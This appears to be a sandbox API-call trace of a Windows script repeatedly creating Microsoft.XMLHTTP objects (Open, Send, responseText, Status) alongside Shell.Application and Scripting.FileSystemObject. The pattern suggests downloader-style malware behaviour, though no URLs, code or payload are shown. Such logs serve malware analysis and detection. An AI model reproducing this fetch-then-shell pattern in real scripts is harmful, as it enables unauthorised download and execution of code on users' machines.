	[0609.324] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0609.324] SysStringLen (param_1=0x0) returned 0x0
	[0609.324] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0609.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0609.324] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0609.324] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0609.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0609.324] ??2@YAPEAX_K@Z () returned 0x62f310
	[0609.324] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0609.324] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0609.324] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0609.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0609.324] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0609.324] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.324] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0609.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0609.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0609.325] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0609.325] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0610.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0610.724] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0610.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0610.724] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0610.725] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0610.725] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0610.725] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0610.725] SysStringLen (param_1=0x0) returned 0x0
	[0610.725] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0610.725] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0610.725] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0610.725] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0610.725] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0610.726] ??2@YAPEAX_K@Z () returned 0x62f350
	[0610.726] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0610.726] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0610.726] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0610.726] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0610.726] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0610.726] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0610.726] SysStringLen (param_1=0x0) returned 0x0
	[0610.726] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0610.730] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0610.730] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0610.730] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0610.730] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0610.730] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0610.730] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0612.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0612.184] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0612.184] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0612.185] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0612.185] SysStringLen (param_1=0x0) returned 0x0
	[0612.186] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0612.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0612.186] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0612.186] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0612.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0612.186] ??2@YAPEAX_K@Z () returned 0x62f310
	[0612.186] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0612.186] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0612.186] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0612.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0612.186] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0612.186] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.187] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0612.189] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.189] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0612.189] SysStringLen (param_1=0x0) returned 0x0
	[0612.189] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0612.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0612.190] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0612.190] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0612.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72d8) returned 0x0
	[0612.190] ??2@YAPEAX_K@Z () returned 0x62f330
	[0612.190] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72d8, pUnkSite=0x62f330) 
	[0612.190] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0612.190] XMLHTTPRequest:IUnknown:Release (This=0x49c72d8) returned 0x0
	[0612.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0612.190] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0612.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.190] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0612.190] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0612.191] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0612.191] SysStringLen (param_1=0x0) returned 0x0
	[0612.191] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0612.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0612.191] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0612.191] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0612.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0612.191] ??2@YAPEAX_K@Z () returned 0x62f310
	[0612.191] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f310) 
	[0612.191] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0612.191] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0612.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0612.191] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0612.191] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0612.192] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0612.192] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
